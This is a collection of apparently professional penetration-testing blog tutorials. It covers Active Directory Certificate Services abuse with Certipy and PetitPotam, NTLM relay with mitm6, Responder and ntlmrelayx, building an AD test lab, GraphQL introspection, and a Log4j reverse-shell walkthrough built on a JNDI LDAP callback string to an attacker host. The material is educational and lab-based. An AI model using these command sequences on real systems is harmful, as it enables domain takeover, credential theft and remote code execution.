    To exploit this vulnerability, we can use Certipy to relay incoming connections to the CA server. Upon a successful relay we will gain access to a certificate for the relayed machine or the user account. But what really makes this a powerful attack is that we can relay the domain controller machine account, effectively giving us complete access to the domain. Using PetitPotam we can continue the attack and easily force the domain controller to authenticate to us.

The first step is to set up Certipy to relay the incoming connections to the vulnerable certificate authority. Since we are planning on relaying a domain controller’s connection, we need to specify the domain controller template.

    certipy relay -ca {Certificate Authority IP Address} -template DomainController
    Using Certipy to Relay Incoming Connections

    Update 1/11/2024: While on an engagement I found that the organization had changed the default certificate templates. They had switched out the DomainController template with another one. So while I could successfully force a Domain Controller to authenticate, I would receive an error when trying to get a DomainController certificate. After a longer time than I care to admit, I used certipy to check the enabled templates and found that DomainController was not one of them. All I had to do was change the template name to match their custom template name. TL;DR: Check the templates if there is an error getting a DomainController certificate.

    Now that Certipy is setup to relay connections, we use PetitPotam to coerce the domain controller into authenticating against our server.

    python3 PetitPotam.py -u {Username} -p {Password} {Listener IP Address} {Target IP Address}
    Using PetitPotam to force authentication

    After Certipy receives the connection it will relay the connection and get a certificate for the domain controller machine account.

    Successful relay attack

    We can then use Certipy to authenticate with the certificate, which gives access to the domain controller’s machine account hash.

certipy auth -username {Username} -domain {Domain} -dc-ip {DC IP Address} -pfx {Certificate}
    Getting Machine Hash

    We can then use this hash with Secretsdump from the impacket library to dump all the user hashes. We can also use the hash with other tools such as CrackMapExec (CME) and smbclient. Basically anything that allows us to login with a username and hash would work. Here we use Secretsdump.

    impacket-secretsdump {Domain/Username@IP Address} -hashes {Hash}
    Dumping the domain

At this point we have complete access to the Windows domain.

    Update 1/23/2024: I have seen web enrollment where it does not listen on port 80 over HTTP, which is the default for certipy. I tried to use certipy on an engagement where web enrollment was listening only over HTTPS, and I ran into some weird issues. I found that NTLMRelay seems to work better in that situation, so I’ve written a new post detailing that attack.

    Exploit 2: ESC3

In order to test additional misconfigurations that Certipy will identify and exploit, I started adding new certificate templates to the domain. While configuring the new template, I checked the “Supply in the request” option, which popped up a warning box about possible issues.

    Warning on new certificate

    Given that I want to exploit possible misconfigurations, I was happy to see it.

    Note: If you are testing in your own environment, once you create the template you will need to configure the CA to actually serve it.

After creating and configuring the new certificate template, we use Certipy to enumerate vulnerable templates using the same command we used to start the previous attack. Certipy identified that the new template was vulnerable to the ESC3 issue.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Vulnerable template

    Exploiting this issue can allow an attacker to escalate privileges from those of a normal domain user to a domain administrator. The first step to gaining domain administrator privileges is to request a new certificate based on the vulnerable template. We will need access to the domain as a standard user.

    certipy req -dc-ip {DC IP Address} -u {Username} -p {Password} -target-ip {CA IP Address} -ca {CA Server Name} -template {Vulnerable Template Name}
    Getting new certificate

    After acquiring the new certificate, we can use Certipy to request another certificate, this time a User certificate, for the administrator account.

    certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA IP Address} -template User -on-behalf-of {Domain\Username} -pfx {Saved Certificate}
    Getting Administrator Certificate

    With the certificate for the administrator user, we use certipy to authenticate with the domain, giving us access to the administrator’s password hash.

    certipy auth -pfx {Saved Administrator Certificate} -dc-ip {DC IP Address}
    Authenticating with Administrator Certificate

    At this point we have access to the domain as the domain’s Administrator account. Using the tools we’ve previously learned about like CME, we can take complete control of the domain.

    crackmapexec smb {Target IP Address} -u {Username} -H {Password Hash}
    Spraying hashes using CME

    From this point, we can use the Secretsdump utility to gather user password hashes from the domain, as previously illustrated.

    Exploit 3: ESC4

Another vulnerable misconfiguration can occur if users have too much control over the certificate templates. First, I configured a certificate template in my test network that gives users complete control over the template.

    Users have full control of template

    Now we use Certipy to show the vulnerable templates using the same command as we used in the prior exploits.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Vulnerable template

    We can use Certipy to modify the certificate to make it vulnerable to ESC1, which allows a user to supply an arbitrary Subject Alternative Name.

    The first step is to modify the vulnerable template to make it vulnerable to another misconfiguration.

certipy template -u {Username} -p {Password} -template {Vulnerable Template Name} -save-old -target-ip {CA Server IP Address}
    Changing the template

Note that we can use the -save-old flag to save the old configuration. This allows us to restore the template after the exploit.

    After modifying the template, we can request a new certificate specifying that it is for the administrator account. When specifying the new account use the account@domain format.

    certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA Server IP Address} -template {Template Name} -upn {Target Username@Domain} -dc-ip {DC IP Address}
    Requesting new certificate

    Before we get too far, it’s a good idea to restore the certificate template.

    certipy template -u {Username} -p {Password} -template {Template Name} -configuration {Saved Template Setting File} -dc-ip {DC IP Address}
    Restoring the Template

    After that we can authenticate with the certificate, again gaining access to the administrator’s hash.

    certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
Authenticating with certificate

Exploit 4: Admin Control over CA Server

    Another route to domain privilege escalation is if we have administrator access over the CA server. In the example lab I am just using a domain administrator account, but in a real engagement this access can be gained any number of ways.

If we have administrator access over the CA server, we can use Certipy to back everything up, including the private keys and certificates.

    certipy ca -backup -ca {CA Server Name} -u {Username} -p {Password} -dc-ip {DC IP Address}
    Backing up the CA server

After backing up the CA server, we can use Certipy to forge a new certificate for the administrator account. In a real engagement the domain information would have to be changed.

    certipy forge -ca-pfx {Name of Backup Certificate} -upn {Username@Domain} -subject 'CN=Administrator,CN=Users,DC={Domain Name},DC={Domain Top Level}'
     Forging new certificate

    After forging the certificate, we can use it to authenticate, again giving us access to the user’s NTLM password hash.

    certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
    Authenticating with forged certificate

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • AD Series: How to Perform Broadcast Attacks Using NTLMRelayx, MiTM6 and Responder

Now that we’ve set up an AD test environment in my last post, we’re ready to try out broadcast attacks on our vulnerable test network.

    In this post we will learn how to use tools freely available for use on Kali Linux to:

    • Discover password hashes on the network
    • Pivot to other machines on the network using discovered credentials and hashes
    • Relay connections to other machines to gain access
    • View internal file shares

    For the attacker machine in my lab, I am using Kali Linux. This can be deployed as a virtual machine on the Proxmox server that we setup in my previous post or can be a separate machine as long as the Active Directory network is reachable.

    Most tools we will use are preinstalled on Kali:

    • MiTM6: Download from GitHub
    • Responder: Installed on Kali
    • CrackMapExec: Installed on Kali
• Ntlmrelayx: Installed on Kali (run using impacket-ntlmrelayx)
• Proxychains: Installed on Kali

Setting up the Attack

    Within Kali, first we’ll start MiTM6:

    sudo mitm6 -i {Network Interface}
    sudo mitm6 -i eth1
    
    Starting MiTM6

MiTM6 will pretend to be a DNS server for an IPv6 network. By default, Windows prefers IPv6 over IPv4 networks. Most organizations don’t utilize the IPv6 network space but don’t have it disabled in their Windows domains. Therefore, by advertising as an IPv6 router and setting the default DNS server to be the attacker, MiTM6 can spoof DNS entries, allowing for man-in-the-middle attacks. A note in their GitHub even mentions that it is designed to run with tools like ntlmrelayx and responder.

    Next we start Responder:

    sudo responder -I {Network Interface}
    sudo responder -I eth1
    Starting responder

    Responder will listen for broadcast name resolution requests and will respond to them on its own. It also has multiple servers that will listen for network connections and attempt to get user computers to authenticate with them, providing the attacker with their password hash. There is more to the tool than what is covered in this tutorial, so check it out!

    With MiTM6 and Responder running, next we start CrackMapExec (CME):

crackmapexec smb {Network} --gen-relay-list {OutFile}
    Starting CrackMapExec

CME is a useful tool for testing Windows computers on the domain. There are many functions within CME that we won’t be discussing in this post, so I definitely recommend taking a deeper look! In this post we are using CME to enumerate SMB servers, to check whether SMB message signing is required, and to connect to systems and perform post-exploitation activities.

First we will use CME to find all of the SMB servers on the AD network (10.80.0.0/24) and, additionally, to find those servers that do not require message signing. It saves the ones that don’t to a file named relay.lst.

    Now we’re ready to start ntlmrelayx to relay credentials:

    impacket-ntlmrelayx -tf {File Containing Target SMB servers} -smb2support
    impacket-ntlmrelayx -tf relay.lst -smb2support
    Starting ntlmrelayx

Ntlmrelayx is a tool that listens for incoming connections (mostly SMB and HTTP) and will, when one is received, relay (think forwarding) the connection/authentication to another SMB server. These other SMB servers are those that were found earlier by CME with the --gen-relay-list flag, so we know they don’t require message signing. Note that the smb2support flag just tells ntlmrelayx to set up an SMBv2 server.

    Almost immediately we start getting traffic over HTTP:

    Ntlmrelayx sees traffic
    Running the Attack

    So far the responder, mitm6 and ntlmrelayx screens just show the initial starting of the program. Not much is actually happening in any of them. The CME screen is just showing the usage to gather SMB servers that don’t require message signing.

    To help things along with our demo, we can force one of the computers on the network to attempt to access a share that doesn’t exist.

    Forcing a computer to attempt to access a share that doesn't exist

While a user looking for a share that doesn’t exist is not needed for this attack, it’s a quick way to skip waiting for an action to occur organically. Many times on corporate networks, machines will mount shares automatically or users will need a share at some point, allowing an attacker to poison those requests. If responder is the first to answer, our attack works; if not, the attack doesn’t work in that instance.

    Responder captures and poisons the response so that the computer connects to ntlmrelayx, which is still running in the background.

    Below we see where responder hears the search for “newshare” and responds with a fake/poisoned response saying that the attacker’s machine is in fact the host for “newshare.” This causes the victim machine to connect to ntlmrelayx which then relays the connection to another computer that doesn’t require message signing. We don’t need to see or crack a user password hash since we are just acting as a man in the middle (hence MiTM) and relaying the authentication from an actual user to another machine.

    Responder hears the request and answers with a poisoned response

    In this case the user on the Windows machine who searched for “newshare” turns out to be an administrator over some other machines, particularly the machine that ntlmrelayx relayed their credentials to. This means that ntlmrelayx now has administrator access to that machine.

    The default action when ntlmrelayx has admin rights is to dump the SAM database. The SAM database holds the usernames and password hashes (NTLM) for accounts local to that computer. Due to how Windows authentication works, having the NTLM hash grants access as if we had the password itself. This means we can log in to this computer at any time as the local administrator WITHOUT cracking the hash. NTLM hashes are often easy to crack, but skipping that step entirely speeds up our attack.

    If other computers on the network share the same local accounts, we can then log in to those computers as the admin as well. We could also use CME to spray the local admin password hash to check for credential reuse. Keep in mind that the rights and access we get to a server all depend on the rights of the user we are pretending to be. In pentests, we often do not start with an admin user and need to find ways to pivot from our initial user to other users with more access until we gain admin access.
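
    A pass-the-hash spray with CME might look like the sketch below; the network range comes from earlier in this post, while the username and hash placeholders are whatever was recovered from the SAM dump:

    crackmapexec smb 10.80.0.0/24 -u Administrator -H {NTLM Hash} --local-auth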

    The following screenshot shows ntlmrelayx dumping all of the local SAM password hashes on one device on our test network:

    Ntlmrelayx dumping the local SAM password hashes from the compromised device

    While getting the local account password hashes and gaining access to new machines is a great attack, ntlmrelayx has more flags and modes that allow for other attacks and access. Let’s continue to explore these.

    Playing around with --interactive

    Ntlmrelayx has a mode that creates new TCP sockets, allowing an attacker to interact with the SMB connections established after a successful relay. The flag is --interactive.
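
    Building on the earlier relay command, a sketch of that invocation looks like this (-i is the short form of --interactive):

    impacket-ntlmrelayx -tf relay.lst -smb2support -i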

    Ntlmrelayx using the --interactive flag

    When the relay is successful a new TCP port is opened. We can connect to it with Netcat:

    Connecting to the new TCP port using netcat

    We can now interact with the host and the shares that are accessible to the user who is relayed.

    nc 127.0.0.1 11000
    nc 127.0.0.1 11001
    Commands that allow us to interact with the host now that we have access through netcat
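
    Once connected, the session behaves like a small SMB client shell. The exact commands can vary by Impacket version and aren’t reproduced from the screenshot, but a hypothetical exchange might look like:

    shares
    use C$
    ls
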
    Playing around with -SOCKS

    With a successful relay ntlmrelayx can create a proxy that we can use with other tools to authenticate to other servers on the network. To use this proxy option ntlmrelayx has the -socks flag.

    Here we use ntlmrelayx with the -socks flag to use the proxy option:
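
    Based on the relay command shown earlier, a sketch of the invocation with the proxy option looks like this:

    impacket-ntlmrelayx -tf relay.lst -smb2support -socks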

    Starting ntlmrelayx with the -socks flag

    Below we see another user’s SMB connection being relayed to an SMB server. With the proxy option, ntlmrelayx sets up a proxy listener locally. When a new session is created (i.e., a user’s request is relayed successfully), it is added to the running sessions. Then, by directing other tools to the proxy server from ntlmrelayx, we can use those tools to interact with these sessions.

    Using the SOCKS connection to proxy to another SMB server

    In order to use this feature, we need to set up our proxychains instance to use the proxy server started by ntlmrelayx.

    The following screen shows the proxychains configuration file at /etc/proxychains4.conf. Here we can see that, when we use the proxychains program, it is going to look for a socks4 proxy at localhost on port 1080. Proxychains is another powerful tool that can do much more than this. I recommend taking a deeper look.

    The proxychains configuration file at /etc/proxychains4.conf
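
    For reference, the relevant entry described above is only a couple of lines; the rest of the file can remain at its defaults:

    [ProxyList]
    socks4  127.0.0.1 1080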

    Once we have proxychains set up, we can use any program that logs in over SMB. All we need is a user that has an active session. We can view active sessions that we can use to relay by issuing the socks command on ntlmrelayx:

    Socks relay targets

    In this example I have a backup.admin session for each of the other two computers. Let’s use secretsdump from the Impacket library to gather hashes from the computer.
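
    Run through proxychains, a sketch of that command looks like the following; the domain and target IP are placeholders for your own lab values:

    proxychains impacket-secretsdump {Domain}/backup.admin@{Target IP}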

    Using impacket's secretsdump to gather hashes from the computer

    When the program asks for a password we can supply any text at all, as ntlmrelayx will handle the authentication for us and dump the hashes.

    Dumping the local hashes using secretsdump

    Since I am using a private test lab, the password for backup.admin is “Password2.” Here is an example of logging in with smbclient using the correct password:

    Viewing SMB shares as the user would with the smbclient command and their password
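
    As a sketch, with the lab credentials above and a placeholder target IP, listing shares directly might look like:

    smbclient -L //{Target IP} -U 'backup.admin%Password2'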

    Using proxychains to proxy the request through ntlmrelayx, we can submit the wrong password and still log in successfully to see the same information:

    Viewing proxychains without the password to obtain the same view as above
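
    The proxied version is nearly identical; the password value is ignored because ntlmrelayx answers the authentication for us:

    proxychains smbclient -L //{Target IP} -U 'backup.admin%WrongPassword'
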
    Next Steps

    All of the tools we discussed are very powerful, and this is just a sampling of what they can be used for. At Raxis we use these tools on most internal network tests. If you’re interested in a pentesting career, I highly recommend that you take a deeper look at them after performing the examples in this tutorial.

    I hope you’ll join me next time when I discuss Active Directory Certificate Services and how to exploit them in our test AD environment.

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • How to Create an AD Test Environment

    Lead Pentester Andrew Trexler walks us through creating a simple AD environment.

    Whether you use the environment to test new hacks before trying them on a pentest, or you use it while learning to pentest and study for the OSCP exam, it is a useful tool to have in your arsenal.

    The Basics

    Today we’ll go through the steps to set up a Windows Active Directory test environment using Proxmox to virtualize the computers. In the end, we’ll have a total of three connected systems, one Domain Controller and two other computers joined to the domain.

    Setting up the Domain Controller (DC)

    The first step is to set up a new virtualized network that will contain the Windows Active Directory environment. Select your virtualization server on the left:

    Select virtual server

    This is a Windows-based environment, but we’re using a Linux hypervisor to handle the underlying network architecture, so under System, select Network, and then create a Linux Bridge, as shown in Figures 2 and 3:

    Create a Linux Bridge
    Creating a new network

    After setting up the network, we provision a new virtual machine where we will install Windows 2019 Server. Figure 4 shows the final configuration of the provisioned machine:

    Provisioning Windows Server

    The next step is to install Windows 2019 Server. While installing, make sure to choose the Desktop Experience edition of the operating system. This ensures a GUI is installed, making it easier to configure the system.

    Fresh Install of Windows 2019

    Now that we have a fresh install, the next step is to configure the domain controller with a static IP address. This will allow the server to function as the DHCP server. Also make sure to set the server’s own IP as its DNS server, since the system will later be configured as the domain’s DNS server.

    Configure Static IP Address

    In order to make things easier to follow and understand later, let’s rename the computer to DC1 since it will be acting as our domain controller on the Active Directory domain.

    Renaming to DC1

    Next, configure the system as a domain controller by using the Add Roles and Features Wizard to add the Active Directory Domain Services and DNS Server roles. This configuration will allow the server to fulfill the roles of a domain controller and DNS server.

    Adding Required Features

    After the roles are installed, we can configure the server and provision the new Active Directory environment. In this lab we will use the domain ad.lab. Other than creating a new forest and setting the name, the default options will be fine.

    Setting up the Domain
    Setting Up the DHCP Service

    The next step is to configure the DHCP service. Here we are using a portion of the 10.80.0.0/24 network space, leaving enough addresses available to accommodate static IP addressing where necessary.

    Setting up DHCP Service

    There is no need for any exclusions on the network, and we will set the lease to be valid for an entire year.

    Adding a Domain Administrator and Users

    Additional configuration is now required within the domain. Let’s add a new domain administrator and some new domain users. Their names and passwords can be anything you want, just make sure to remember them.

    Choosing Option to Add new User

    First we create the Domain Administrator (DA):

    Adding New Administrator Account
    Adding User to Domain Admins

    Here we also make this user an Enterprise Admin (EA) by adding them to the Enterprise Admins group:

    Add User to Enterprise Admins

    Next we will add a normal user to the domain:

    Adding a normal user
    Creating Windows PC

    At this point we should have a functional Active Directory domain with active DHCP and DNS services. Next, we will setup and configure two other Windows 10 machines and join them to the domain.

    The first step is to provision the resources on the Proxmox server. Since our test environment requires only moderate resources, we will only provision the machines with two processor cores and two gigabytes of RAM.

    Provisioned Resources for Windows 10

    Then we install Windows 10 using the default settings. Once Windows is installed, we can open the Settings page and join the system to the ad.lab domain, changing the computer name to something easy to remember if called for.

    Joining the ad.lab domain

    Adding the system to the domain will require us to enter a domain admin’s password. After a reboot we should be able to login with a domain user’s account.

    Seeing the Raxis user from the Ad.lab domain
    SMB Share

    At this point, there should be three computers joined to the Active Directory domain. Using CrackMapExec, we can see the SMB server running on the domain controller, but no other systems are visible via SMB. So let’s add a new network share. Open Explorer.exe, select Advanced Sharing, and share the C drive.

    I don’t recommend sharing the entire drive in an environment not used for testing, as it’s not secure: the entire contents of the machine would be visible. Since this is a pentest lab environment, though, this is exactly what we are looking for.

    Creating new share

    Creating the share resulted in the system exposing the SMB service to the network. In Figure 20 we verified this by using CrackMapExec to enumerate the two SMB servers:

    CrackMapExec Showing Two SMB servers
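
    The enumeration itself is a one-liner; a sketch using this lab’s network range:

    crackmapexec smb 10.80.0.0/24
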
    Conclusion

    At this point, our environment should be provisioned, and we are ready to test out different AD test cases, attacks, and other shenanigans. This environment is a great tool for ethically learning different exploits and refining pentesting techniques. Using a virtual infrastructure such as this also provides rollback capability for running multiple test cases with minimal downtime.

    I hope you’ll come back to see my next posts in this series, which will show how to use this environment to test common exploits that we find during penetration testing.

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • Exploiting GraphQL

    GraphQL is a query language inspired by the structure and functionality of online data storage and collaboration platforms such as Facebook, Instagram, and Google Sheets. This post will show you how to take advantage of one of its soft spots.

    Development

    Facebook developed GraphQL in 2012, and it became open source in 2015. It’s designed to let applications query data and functionality stored in a database or behind an API without having to know the internal structure or implementation. It makes use of the structural information exchanged between the source and the engine to perform query optimization, such as removing redundancy and including only the information that is relevant to the current operation.

    Since GraphQL is a query language (meaning you have to know how to code with it), many opt to use a platform to do the hard work. Companies like the New York Times, PayPal, and even Netflix have dipped into the GraphQL playing field by using Apollo.

    Apollo

    Apollo Server is an open-source, spec-compliant tool that’s compatible with any GraphQL client. It builds a production-ready, self-documenting GraphQL API that can use data from any source.

    Apollo GraphQL has three primary tools and is well documented.

    • Client: A client-side library that helps you digest a GraphQL API along with caching the data that’s received.
    • Server: A library that connects your GraphQL Schema to a server. Its job is to communicate with the backend to send back responses based off the request of the client.
    • Engine: Tracks errors, gathers stats, and performs other monitoring tasks between the Apollo client and the Apollo server.

    (We now understand that GraphQL is a query language and Apollo is a spec-compliant GraphQL server.)

    A pentester’s perspective

    What could be better than fresh, new, and developing technology? Apollo seems to be the king of the hill, but the issue is that Apollo’s ecosystem is developing quickly. Its popularity is growing along with GraphQL, and there seems to be no real competition on the horizon, so it’s not surprising to see more and more implementations. The most difficult part for developers is building proper access controls for each request and implementing a resolver that integrates with those access controls. Another key point is the constant stream of new build releases with new bugs.

    Introspection

    Batch attacks, SQLi, and debugging operations that disclose information are known vulnerabilities when implementing GraphQL. This post will focus on Introspection.

    Introspection enables you to query a GraphQL server for information about the schema it uses: fields, queries, types, and so on. Introspection is mainly meant for discovery and as a diagnostic tool during the development phase. In a production system you usually don’t want just anyone knowing how to run queries against sensitive data, because anyone who does can take advantage of that knowledge. For example, the following field contains interesting information that can be queried by anyone on a GraphQL API in a production system with introspection enabled:

    Information that can be gathered when querying a GraphQL API
    Let’s try it

    One can obtain this level of information in a few ways. One way is to use Burp Suite and the GraphQL Raider plugin. This plugin allows you to isolate the query statement and experiment on the queries. For example, intercepting a POST request to “/graphql”, you may see a query in the body, as shown below:

    Burp intercept of webpage communication showing the query that is being sent to the server, which indicates that GraphQL is in use

    Using Burp Repeater with GraphQL we can change the query located in the body and execute an Introspection query for ‘name’ and see the response.

    Knowing GraphQL is in use, we use Burp Extension GraphQL Raider to focus just on queries. Here we are requesting field names in this standard GraphQL request, but this can be changed to a number of combinations for more results once a baseline is confirmed.

    This request checks the ‘schema’ for all ‘types’ by ‘name’. The response to that query is shown on the right.

    Looking further into the response received, we see a response “name”: “allUsers”. Essentially what is happening is we are asking the server to please provide information that has “name” in it. The response gave a large result, and we spot “allUsers”. If we queried that specific field, it would likely provide all the users.

    The alternative is to use curl. You can perform the same actions simply by placing the information in a curl statement. The same request as above, translated to curl, would be similar to:

    Curl statement requesting a POST with an application header for a specific URL with data request using the GraphQl query. Specifically, this query is communicating with the schema types and getting field names.
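
    The exact command from the screenshot isn’t reproduced here, but a minimal sketch (with a placeholder target URL) looks like this:

    curl -s -X POST http://{Target}/graphql -H 'Content-Type: application/json' -d '{"query":"{__schema{types{name}}}"}'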

    You could opt to do this in the browser address bar as well, but that can be temperamental at times. So you can see how easy it is to start unraveling the treasure trove of information all without any authentication.

    Even more concerning are the descriptive errors the system provides that can help a malicious attacker succeed. Here we use a different curl statement to the server.

    This is the same request except that the query is for “system.”
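
    As a sketch, with the same placeholder target, that request might look like:

    curl -s -X POST http://{Target}/graphql -H 'Content-Type: application/json' -d '{"query":"{system}"}'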

    When the request cannot be fulfilled, the server tries its best to recommend a legitimate field request. This allows the malicious attacker to formulate and build statements one error at a time if needed:

    This is a verbose response received from GraphQL that actually recommends an appropriate query if yours isn’t correct.

    Pentest ToolBox

    Ethical hackers would be wise to add this full introspection query to their toolbox, as it returns a long list of objects, fields, mutations, descriptions, and more:

    {__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

    Ethical hackers may want to add these paths to their directory brute-force attacks as well (one way to do so is sketched after the list):

    • /graphql
    • /graphiql
    • /graphql.php
    • /graphql/console
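
    One way to check those paths, sketched here with ffuf and a hypothetical wordlist built from the list above (the target URL is a placeholder):

    printf '%s\n' graphql graphiql graphql.php graphql/console > graphql-paths.txt
    ffuf -w graphql-paths.txt -u http://{Target}/FUZZ -mc all -fc 404
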
    Conclusion

    Having GraphQL introspection enabled in production might expose sensitive information and expand the attack surface. Best practice recommends disabling introspection in production unless there is a specific use case. Even then, consider allowing introspection only for authorized requests, and use a defense-in-depth approach.

    You can turn off introspection in production by setting the value of the introspection config key on your Apollo Server instance.

    This is the proper configuration in a production system to turn off Introspection on a new Apollo server.

    Although this post only addresses Introspection, GraphQL/Apollo is still known to be vulnerable to the attacks I mentioned at the beginning – batch attacks, SQLi, and debugging operations that disclose information – and we will address those in subsequent posts. However, the easiest and most common attack vector is Introspection. Fortunately, it comes with an equally simple remedy: Turn it off.

     

  • Log4j: How to Exploit and Test this Critical Vulnerability

    UPDATE: On November 16, the Cybersecurity and Infrastructure Security Agency (CISA) announced that government-sponsored actors from Iran used the Log4j vulnerability to compromise a federal network and deploy a crypto miner and credential harvester.

    In this article Raxis, a top-tier provider of cybersecurity penetration testing, demonstrates how a remote shell can be obtained on a target system using a Log4j open source exploit that is available to anyone.

    Introduction

    This critical vulnerability, labeled CVE-2021-44228, affects a large number of customers, as the Apache Log4j component is widely used in both commercial and open source software. In addition, ransomware attackers are weaponizing the Log4j exploit to increase their reach to more victims across the globe.

    Our demonstration is provided for educational purposes to a more technical audience with the goal of providing more awareness around how this exploit works. Raxis believes that a better understanding of the composition of exploits is the best way for users to learn how to combat the growing threats on the internet.

    Log4j Exploit Storyboard

    The Apache Log4j vulnerability, CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228), affects a large number of systems, and attackers are currently exploiting it on internet-connected systems across the world. To demonstrate the anatomy of such an attack, Raxis provides a step-by-step demonstration of the exploit in action. Within our demonstration, we make assumptions about the network environment used for the victim server that would allow this attack to take place. There are certainly many ways to prevent this attack from succeeding, such as using more secure firewall configurations or other advanced network security devices; however, we selected a common “default” security configuration for purposes of demonstrating this attack.

    Victim Server

    First, our victim server is a Tomcat 8 web server that uses a vulnerable version of Apache Log4j and is configured and installed within a docker container. The docker container allows us to demonstrate a separate environment for the victim server that is isolated from our test environment. Our Tomcat server is hosting a sample website obtainable from https://github.com/cyberxml/log4j-poc and is configured to expose port 8080 for the vulnerable web server. No other inbound ports for this docker container are exposed other than 8080. The docker container does permit outbound traffic, similar to the default configuration of many server networks.
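
    As a rough sketch, standing up such a container could look like the following; the image name and build steps are assumptions, so check the repository’s own instructions before relying on them:

    git clone https://github.com/cyberxml/log4j-poc
    cd log4j-poc
    docker build -t log4j-poc .
    docker run --rm -p 8080:8080 log4j-poc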

    Note that this particular GitHub repository also features a built-in version of the Log4j attack code and payload; however, we disabled it for our example in order to provide a view into the screens as seen by an attacker. We are only using the Tomcat 8 web server portions, as shown in the screenshot below.

    Victim Tomcat 8 Demo Web Server Running Code Vulnerable to the Log4j Exploit

    Next, we need to set up the attacker’s workstation. Using exploit code from https://github.com/kozmer/log4j-shell-poc, Raxis configures three terminal sessions, called Netcat Listener, Python Web Server, and Exploit, as shown below.

    Netcat Listener, Port 9001

    The Netcat Listener session, indicated in Figure 2, is a Netcat listener running on port 9001. This session will catch the shell that is passed to us from the victim server via the exploit.
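
    A typical way to start such a listener (a minimal sketch):

    nc -lvnp 9001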

    Attacker’s Netcat Listener on Port 9001
    Python Web Server, Port 80

    The Python Web Server session in Figure 3 is a Python web server running on port 80 to distribute the payload to the victim server.
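
    Python’s built-in web server works for this; a sketch (binding to port 80 requires root):

    sudo python3 -m http.server 80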

    Attacker’s Python Web Server to Distribute Payload
    Exploit Code, Port 1389

    The Exploit session, shown in Figure 4, is the proof-of-concept Log4j exploit code operating on port 1389, creating a weaponized LDAP server. This code will redirect the victim server to download and execute a Java class that is obtained from our Python Web Server running on port 80 above. The Java class is configured to spawn a shell to port 9001, which is our Netcat listener in Figure 2.
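
    For reference, the kozmer PoC is typically launched along these lines; treat the flag names as an assumption drawn from the repository’s usage at the time of writing, and substitute your own attacker IP:

    python3 poc.py --userip {Attacker IP} --webport 80 --lport 9001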

    Attacker’s Log4J Exploit Code
    Execute the Attack

    Now that the code is staged, it’s time to execute our attack. We’ll connect to the victim web server using a Chrome web browser. Our attack string, shown in Figure 5, exploits JNDI to make an LDAP query to the Attacker’s Exploit session running on port 1389.
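
    The exact string from the screenshot isn’t reproduced here, but a typical Log4Shell payload of this form looks like the following, with the attacker IP as a placeholder and the trailing path purely illustrative:

    ${jndi:ldap://{Attacker IP}:1389/a}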

    Victim’s Website and Attack String

    The attack string exploits a vulnerability in Log4j and requests that a lookup be performed against the attacker’s weaponized LDAP server. To do this, an outbound request is made from the victim server to the attacker’s system on port 1389. The Exploit session in Figure 6 indicates the receipt of the inbound LDAP connection and redirection made to our Attacker’s Python Web Server. 

    Attacker’s Exploit Session Indicating Inbound Connection and Redirect

    The Exploit session has sent a redirect to our Python Web Server, which is serving up a weaponized Java class that contains code to open up a shell. This Java class was actually configured from our Exploit session and is only being served on port 80 by the Python Web Server. The connection log is shown in Figure 7 below.

    Attacker’s Python Web Server Sending the Java Shell

    The last step in our attack is where Raxis obtains the shell with control of the victim’s server. The Java class sent to our victim contained code that opened a remote shell to our attacker’s netcat session, as shown in Figure 8. The attacker now has full control of the Tomcat 8 server, although limited to the docker session that we had configured in this test scenario. 

    Attacker’s Access to Shell Controlling Victim’s Server
    Conclusion

    As we’ve demonstrated, the Log4j vulnerability is a multi-step process that can be executed once you have the right pieces in place. Raxis is seeing this code implemented in ransomware attack bots that are scanning the internet for systems to exploit. This is certainly a critical issue that needs to be addressed as soon as possible, as it is only a matter of time before an attacker reaches an exposed system.